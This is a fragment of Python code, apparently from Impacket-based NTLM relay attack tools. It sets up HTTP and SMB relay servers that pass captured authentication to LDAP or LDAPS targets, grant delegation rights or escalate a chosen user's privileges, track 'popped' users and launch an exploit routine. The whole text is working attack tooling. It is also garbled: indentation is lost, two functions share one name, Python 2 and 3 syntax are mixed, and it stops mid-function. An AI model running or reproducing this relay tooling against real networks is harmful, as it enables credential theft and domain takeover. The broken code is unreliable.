def start_servers(options, threads):
RELAY_SERVERS = [HTTPRelayServer]
for server in RELAY_SERVERS:
#Set up config
c = NTLMRelayxConfig()
c.setProtocolClients(PROTOCOL_CLIENTS)
c.setExeFile(options.e)
c.setCommand(options.c)
c.setEnumLocalAdmins(options.enum_local_admins)
c.setEncoding(codec)
c.setMode(mode)
c.setAttacks(PROTOCOL_ATTACKS)
c.setLootdir(options.lootdir)
c.setOutputFile(options.output_file)
c.setInteractive(options.interactive)
c.setGPotatoStartUp(options.upload)
c.setIPv6(options.ipv6)
c.setWpadOptions(options.wpad_host, options.wpad_auth_num)
c.setSMB2Support(options.smb2support)
c.setInterfaceIp(options.interface_ip)
c.setExploitOptions(options.remove_mic, options.remove_target)
c.setListeningPort(options.http_port)
s = server(c)
s.start()
threads.add(s)
return c
def startServers(passargs):
ldaps_server = passargs.ldaps
PoppedDB = Manager().dict() # A dict of PoppedUsers
PoppedDB_Lock = Lock() # A lock for opening the dict
c = NTLMRelayxConfig()
c.setProtocolClients(PROTOCOL_CLIENTS)
c.setTargets(
TargetsProcessor(singleTarget=str("ldaps://" + ldaps_server),
protocolClients=PROTOCOL_CLIENTS))
c.setOutputFile(None)
c.setEncoding('ascii')
c.setMode('RELAY')
c.setAttacks(PROTOCOL_ATTACKS)
c.setLootdir('.')
c.setInterfaceIp("0.0.0.0")
c.setExploitOptions(True)
c.setSMB2Support(True)
c.delegateaccess = True
c.PoppedDB = PoppedDB # pass the poppedDB to the relay servers
c.PoppedDB_Lock = PoppedDB_Lock # pass the poppedDB to the relay servers
s = SMBRelayServer(c)
s.start()
logging.info("Relay servers started, waiting for connection....")
try:
status = exploit(passargs)
if status:
exp = Thread(target=checkauth, args=(passargs, ))
exp.daemon = True
exp.start()
try:
while exp.isAlive():
pass
except KeyboardInterrupt as e:
logging.info("Shutting down...")
s.server.shutdown()
else:
logging.error("Error in exploit, Shutting down...")
s.server.shutdown()
except Exception as e:
print(e)
logging.error("Error in exploit, Shutting down...")
logging.info("Shutting down...")
s.server.shutdown()
def startServers(passargs):
targetSystem = passargs.target_host
privuser = passargs.user
PoppedDB = Manager().dict() # A dict of PoppedUsers
PoppedDB_Lock = Lock() # A lock for opening the dict
relayServers = [HTTPRelayServer, SMBRelayServer]
serverThreads = []
for server in relayServers:
c = NTLMRelayxConfig()
c.setProtocolClients(PROTOCOL_CLIENTS)
c.setTargets(
TargetsProcessor(singleTarget=str("ldap://" + targetSystem),
protocolClients=PROTOCOL_CLIENTS))
c.setOutputFile(None)
c.setEncoding('ascii')
c.setMode('RELAY')
c.setAttacks(PROTOCOL_ATTACKS)
c.setLootdir('.')
c.setInterfaceIp("0.0.0.0")
c.setExploitOptions(True)
c.escalateuser = privuser
c.setSMB2Support(True)
c.PoppedDB = PoppedDB # pass the poppedDB to the relay servers
c.PoppedDB_Lock = PoppedDB_Lock # pass the poppedDB to the relay servers
s = server(c)
s.start()
serverThreads.append(s)
logging.info("Relay servers started, waiting for connection....")
try:
status = exploit(passargs)
if status:
exp = Thread(target=checkauth, args=(passargs, ))
exp.daemon = True
exp.start()
try:
while exp.isAlive():
pass
except KeyboardInterrupt, e:
logging.info("Shutting down...")
for thread in serverThreads:
thread.server.shutdown()
else: